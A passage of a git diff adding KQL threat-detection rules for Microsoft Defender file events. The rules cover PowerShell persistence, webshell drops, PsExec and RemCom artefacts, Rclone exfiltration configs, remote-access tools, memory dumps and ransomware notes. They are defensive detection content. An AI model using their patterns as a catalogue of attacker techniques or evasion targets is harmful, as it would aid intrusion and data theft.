+++ b/KQL/rules/windows/file/file_event/potential_suspicious_powershell_module_file_created.kql
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious PowerShell Module File Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-09
+// Level: medium
+// Description: Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production.
+
+DeviceFileEvents
+| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.ps") or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.dll")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_webshell_creation_on_static_website.kql b/KQL/rules/windows/file/file_event/potential_webshell_creation_on_static_website.kql
new file mode 100644
index 00000000..397ebdfd
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_webshell_creation_on_static_website.kql
@@ -0,0 +1,12 @@
+// Title: Potential Webshell Creation On Static Website
+// Author: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo
+// Date: 2019-10-22
+// Level: medium
+// Description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+// False Positives:
+//   - Legitimate administrator or developer creating legitimate executable files in a web application folder
+
+DeviceFileEvents
+| where (((FolderPath contains ".ashx" or FolderPath contains ".asp" or FolderPath contains ".ph" or FolderPath contains ".soap") and FolderPath contains "\\inetpub\\wwwroot\\") or (FolderPath contains ".ph" and (FolderPath contains "\\www\\" or FolderPath contains "\\htdocs\\" or FolderPath contains "\\html\\"))) and (not((FolderPath contains "\\xampp" or InitiatingProcessFolderPath =~ "System" or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_winnti_dropper_activity.kql b/KQL/rules/windows/file/file_event/potential_winnti_dropper_activity.kql
new file mode 100644
index 00000000..953859b2
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_winnti_dropper_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential Winnti Dropper Activity
+// Author: Alexander Rausch
+// Date: 2020-06-24
+// Level: high
+// Description: Detects files dropped by Winnti as described in RedMimicry Winnti playbook
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceFileEvents
+| where FolderPath endswith "\\gthread-3.6.dll" or FolderPath endswith "\\sigcmm-2.4.dll" or FolderPath endswith "\\Windows\\Temp\\tmp.bat"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potentially_suspicious_dmp_hdmp_file_creation.kql b/KQL/rules/windows/file/file_event/potentially_suspicious_dmp_hdmp_file_creation.kql
new file mode 100644
index 00000000..7a48ac32
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potentially_suspicious_dmp_hdmp_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious DMP/HDMP File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-07
+// Level: medium
+// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive.
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and (FolderPath endswith ".dmp" or FolderPath endswith ".dump" or FolderPath endswith ".hdmp")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql b/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql
new file mode 100644
index 00000000..3bd9a478
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious WDAC Policy File Creation
+// Author: X__Junior
+// Date: 2025-02-07
+// Level: medium
+// Description: Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Administrators and security vendors could leverage WDAC, apply additional filters as needed.
+
+DeviceFileEvents
+| where FolderPath contains "\\Windows\\System32\\CodeIntegrity\\" and (not((((InitiatingProcessCommandLine contains "ConvertFrom-CIPolicy -XmlFilePath" and InitiatingProcessCommandLine contains "-BinaryFilePath ") or InitiatingProcessCommandLine contains "CiTool --update-policy" or (InitiatingProcessCommandLine contains "Copy-Item -Path" and InitiatingProcessCommandLine contains "-Destination")) or (InitiatingProcessFolderPath endswith "\\Microsoft.ConfigurationManagement.exe" or InitiatingProcessFolderPath endswith "\\WDAC Wizard.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") or InitiatingProcessFolderPath =~ "System" or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\wuauclt.exe", "C:\\Windows\\UUS\\arm64\\wuaucltcore.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/powershell_module_file_created.kql b/KQL/rules/windows/file/file_event/powershell_module_file_created.kql
new file mode 100644
index 00000000..05104f54
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/powershell_module_file_created.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Module File Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-09
+// Level: low
+// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - Likely
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/powershell_module_file_created_by_non_powershell_process.kql b/KQL/rules/windows/file/file_event/powershell_module_file_created_by_non_powershell_process.kql
new file mode 100644
index 00000000..0fc8d086
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/powershell_module_file_created_by_non_powershell_process.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Module File Created By Non-PowerShell Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-09
+// Level: medium
+// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceFileEvents
+| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\") and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/powershell_profile_modification.kql b/KQL/rules/windows/file/file_event/powershell_profile_modification.kql
new file mode 100644
index 00000000..0971aa8c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/powershell_profile_modification.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Profile Modification
+// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013
+// False Positives:
+//   - System administrator creating Powershell profile manually
+
+DeviceFileEvents
+| where FolderPath endswith "\\Microsoft.PowerShell_profile.ps1" or FolderPath endswith "\\PowerShell\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7-preview\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7\\profile.ps1" or FolderPath endswith "\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" or FolderPath endswith "\\WindowsPowerShell\\profile.ps1"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/powershell_script_dropped_via_powershell_exe.kql b/KQL/rules/windows/file/file_event/powershell_script_dropped_via_powershell_exe.kql
new file mode 100644
index 00000000..258befc7
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/powershell_script_dropped_via_powershell_exe.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Script Dropped Via PowerShell.EXE
+// Author: frack113
+// Date: 2023-05-09
+// Level: low
+// Description: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".ps1") and (not(((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath startswith "C:\\Users\\") or FolderPath contains "__PSScriptPolicyTest_" or FolderPath startswith "C:\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/process_explorer_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/windows/file/file_event/process_explorer_driver_creation_by_non_sysinternals_binary.kql
new file mode 100644
index 00000000..4fbb64c8
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/process_explorer_driver_creation_by_non_sysinternals_binary.kql
@@ -0,0 +1,13 @@
+// Title: Process Explorer Driver Creation By Non-Sysinternals Binary
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-05-05
+// Level: high
+// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
+// Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1068
+// False Positives:
+//   - Some false positives may occur with legitimate renamed process explorer binaries
+
+DeviceFileEvents
+| where (FolderPath contains "\\PROCEXP" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/process_monitor_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/windows/file/file_event/process_monitor_driver_creation_by_non_sysinternals_binary.kql
new file mode 100644
index 00000000..aca6fe50
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/process_monitor_driver_creation_by_non_sysinternals_binary.kql
@@ -0,0 +1,12 @@
+// Title: Process Monitor Driver Creation By Non-Sysinternals Binary
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: medium
+// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1068
+// False Positives:
+//   - Some false positives may occur with legitimate renamed process monitor binaries
+
+DeviceFileEvents
+| where (FolderPath contains "\\procmon" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/psexec_remote_execution_file_artefact.kql b/KQL/rules/windows/file/file_event/psexec_remote_execution_file_artefact.kql
new file mode 100644
index 00000000..91e44e54
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/psexec_remote_execution_file_artefact.kql
@@ -0,0 +1,12 @@
+// Title: PSEXEC Remote Execution File Artefact
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-21
+// Level: high
+// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.privilege-escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/psexec_service_file_creation.kql b/KQL/rules/windows/file/file_event/psexec_service_file_creation.kql
new file mode 100644
index 00000000..50c6f190
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/psexec_service_file_creation.kql
@@ -0,0 +1,10 @@
+// Title: PsExec Service File Creation
+// Author: Thomas Patzke
+// Date: 2017-06-12
+// Level: low
+// Description: Detects default PsExec service filename which indicates PsExec service installation and execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+
+DeviceFileEvents
+| where FolderPath endswith "\\PSEXESVC.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/psscriptpolicytest_creation_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/psscriptpolicytest_creation_by_uncommon_process.kql
new file mode 100644
index 00000000..57a5d22c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/psscriptpolicytest_creation_by_uncommon_process.kql
@@ -0,0 +1,10 @@
+// Title: PSScriptPolicyTest Creation By Uncommon Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-01
+// Level: medium
+// Description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceFileEvents
+| where FolderPath contains "__PSScriptPolicyTest_" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\dsac.exe", "C:\\Windows\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\ServerManager.exe", "C:\\Windows\\System32\\wsmprovhost.exe", "C:\\Windows\\SysWOW64\\sdiagnhost.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")) or ((InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and InitiatingProcessFolderPath endswith "\\pwsh.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/publisher_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/windows/file/file_event/publisher_attachment_file_dropped_in_suspicious_location.kql
new file mode 100644
index 00000000..5812406c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/publisher_attachment_file_dropped_in_suspicious_location.kql
@@ -0,0 +1,12 @@
+// Title: Publisher Attachment File Dropped In Suspicious Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: medium
+// Description: Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Legitimate usage of ".pub" files from those locations
+
+DeviceFileEvents
+| where (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and FolderPath endswith ".pub"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/rclone_config_file_creation.kql b/KQL/rules/windows/file/file_event/rclone_config_file_creation.kql
new file mode 100644
index 00000000..016519fa
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/rclone_config_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: Rclone Config File Creation
+// Author: Aaron Greetham (@beardofbinary) - NCC Group
+// Date: 2021-05-26
+// Level: medium
+// Description: Detects Rclone config files being created
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567.002
+// False Positives:
+//   - Legitimate Rclone usage
+
+DeviceFileEvents
+| where FolderPath contains ":\\Users\\" and FolderPath contains "\\.config\\rclone\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/remcom_service_file_creation.kql b/KQL/rules/windows/file/file_event/remcom_service_file_creation.kql
new file mode 100644
index 00000000..82601c7f
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/remcom_service_file_creation.kql
@@ -0,0 +1,10 @@
+// Title: RemCom Service File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-04
+// Level: medium
+// Description: Detects default RemCom service filename which indicates RemCom service installation and execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+
+DeviceFileEvents
+| where FolderPath endswith "\\RemComSvc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/remote_access_tool_screenconnect_temporary_file.kql b/KQL/rules/windows/file/file_event/remote_access_tool_screenconnect_temporary_file.kql
new file mode 100644
index 00000000..4ba6c0c6
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/remote_access_tool_screenconnect_temporary_file.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - ScreenConnect Temporary File
+// Author: Ali Alwashali
+// Date: 2023-10-10
+// Level: low
+// Description: Detects the creation of files in a specific location by ScreenConnect RMM.
+// ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\<username>\Documents\ConnectWiseControl\Temp\" before execution.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+// False Positives:
+//   - Legitimate use of ScreenConnect
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\ScreenConnect.WindowsClient.exe" and FolderPath contains "\\Documents\\ConnectWiseControl\\Temp\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/renamed_vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules/windows/file/file_event/renamed_vscode_code_tunnel_execution_file_indicator.kql
new file mode 100644
index 00000000..1662a343
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/renamed_vscode_code_tunnel_execution_file_indicator.kql
@@ -0,0 +1,10 @@
+// Title: Renamed VsCode Code Tunnel Execution - File Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: high
+// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control
+
+DeviceFileEvents
+| where FolderPath endswith "\\code_tunnel.json" and (not((InitiatingProcessFolderPath endswith "\\code-tunnel.exe" or InitiatingProcessFolderPath endswith "\\code.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/scr_file_write_event.kql b/KQL/rules/windows/file/file_event/scr_file_write_event.kql
new file mode 100644
index 00000000..24feec24
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/scr_file_write_event.kql
@@ -0,0 +1,12 @@
+// Title: SCR File Write Event
+// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
+// Date: 2022-04-27
+// Level: medium
+// Description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+//   - The installation of new screen savers by third party software
+
+DeviceFileEvents
+| where FolderPath endswith ".scr" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/screenconnect_temporary_installation_artefact.kql b/KQL/rules/windows/file/file_event/screenconnect_temporary_installation_artefact.kql
new file mode 100644
index 00000000..3510f5fa
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/screenconnect_temporary_installation_artefact.kql
@@ -0,0 +1,14 @@
+// Title: ScreenConnect Temporary Installation Artefact
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate use
+
+DeviceFileEvents
+| where FolderPath contains "\\Bin\\ScreenConnect."
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/self_extraction_directive_file_created_in_potentially_suspicious_location.kql b/KQL/rules/windows/file/file_event/self_extraction_directive_file_created_in_potentially_suspicious_location.kql
new file mode 100644
index 00000000..15b419c0
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/self_extraction_directive_file_created_in_potentially_suspicious_location.kql
@@ -0,0 +1,12 @@
+// Title: Self Extraction Directive File Created In Potentially Suspicious Location
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-02-05
+// Level: medium
+// Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.
+// These files are used by the "iexpress.exe" utility in order to create self extracting packages.
+// Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
+| where (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") and FolderPath endswith ".sed"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/startup_folder_file_write.kql b/KQL/rules/windows/file/file_event/startup_folder_file_write.kql
new file mode 100644
index 00000000..e150e9e2
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/startup_folder_file_write.kql
@@ -0,0 +1,12 @@
+// Title: Startup Folder File Write
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate
+
+DeviceFileEvents
+| where FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\wuauclt.exe", "C:\\Windows\\uus\\ARM64\\wuaucltcore.exe")) or (FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\" or FolderPath startswith "C:\\$WinREAgent\\Scratch\\Mount\\")))) and (not((InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" and FolderPath endswith "\\Send to OneNote.lnk")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_aspx_file_drop_by_exchange.kql b/KQL/rules/windows/file/file_event/suspicious_aspx_file_drop_by_exchange.kql
new file mode 100644
index 00000000..7399237b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_aspx_file_drop_by_exchange.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious ASPX File Drop by Exchange
+// Author: Florian Roth (Nextron Systems), MSTI (query, idea)
+// Date: 2022-10-01
+// Level: high
+// Description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+
+DeviceFileEvents
+| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe" and (FolderPath contains "FrontEnd\\HttpProxy\\" or FolderPath contains "\\inetpub\\wwwroot\\aspnet_client\\")) and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_binaries_and_scripts_in_public_folder.kql b/KQL/rules/windows/file/file_event/suspicious_binaries_and_scripts_in_public_folder.kql
new file mode 100644
index 00000000..b896cc0c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_binaries_and_scripts_in_public_folder.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Binaries and Scripts in Public Folder
+// Author: The DFIR Report
+// Date: 2025-01-23
+// Level: high
+// Description: Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204
+// False Positives:
+//   - Administrators deploying legitimate binaries to public folders.
+
+DeviceFileEvents
+| where FolderPath contains ":\\Users\\Public\\" and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_binary_writes_via_anydesk.kql b/KQL/rules/windows/file/file_event/suspicious_binary_writes_via_anydesk.kql
new file mode 100644
index 00000000..a8b8ee3c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_binary_writes_via_anydesk.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Binary Writes Via AnyDesk
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-28
+// Level: high
+// Description: Detects AnyDesk writing binary files to disk other than "gcapi.dll".
+// According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,
+// which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\AnyDesk.exe" or InitiatingProcessFolderPath endswith "\\AnyDeskMSI.exe") and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) and (not(FolderPath endswith "\\gcapi.dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_creation_txt_file_in_user_desktop.kql b/KQL/rules/windows/file/file_event/suspicious_creation_txt_file_in_user_desktop.kql
new file mode 100644
index 00000000..87cf389b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_creation_txt_file_in_user_desktop.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Creation TXT File in User Desktop
+// Author: frack113
+// Date: 2021-12-26
+// Level: high
+// Description: Ransomware create txt file in the user Desktop
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\Desktop\\") and FolderPath endswith ".txt"
\ No newline at end of file
